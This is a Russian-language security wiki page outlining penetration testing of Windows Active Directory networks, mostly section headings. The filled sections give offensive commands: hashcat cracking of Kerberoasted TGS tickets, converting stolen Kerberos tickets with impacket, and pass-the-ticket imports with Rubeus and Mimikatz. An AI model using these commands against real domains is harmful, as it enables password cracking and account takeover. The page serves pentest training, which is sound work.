Active directory

Материал из InformationSecurity WIKI
Версия от 20:19, 18 января 2022; Drakylar (обсуждение | вклад) (Учетные данные)

Перейти к: навигация, поиск


Страница посвящена тестированию на проникновение сетей Active Directory на Windows OS.

Общая информация о сети

Домен

Доменный контроллер

Доменные компьютеры

Дополнительная информация о сети

Список пользователей

Без перебора

С перебором

Время сети

NTP

HTTP

Сетевая информация

IP

Сервисы

Получение начального доступа

Анонимный доступ

Учетные данные

Сетевой перебор учетных данных (пароля)

Перебор учетных данных по протоколам лучше смотреть тут http://itsecwiki.org/index.php/Brute_force


Оффлайн перебор

TGS

Если у вас есть TGS-ticket для доступа к сервису, то вы можете пробрутить пароль учетки от которой будет идти запрос.

Hashcat 

hashcat -m 13100 --force -a0 ./tickget.kerberoast ./pass.txt

TGT-билет

Как Cookie у браузера, он требуется для получения TGS который в свою очередь используется для подключения к сервисам. Если вы нашли файл с TGT-ключем, то у него есть два формата: kirbi & ccache, поэтому надо сконвертировать.

Конвертация

https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketConverter.py 

./ticket_converter.py admin.ccache admin.kirbi
./ticket_converter.py admin.kirbi admin.ccache

Импорт тикета

!Не забудьте установить время то же, пункт выше!

.ccache

Rubeus 

.\Rubeus.exe ppt /ticket:new_ticket.ccache

Mimikatz 

mimikatz # kerberos::ptt new_ticket.ccache

Bash 

export KRB5CCNAME=./test.ccache
Источник — «http://itsecwiki.org/index.php?title=Active_directory&oldid=778»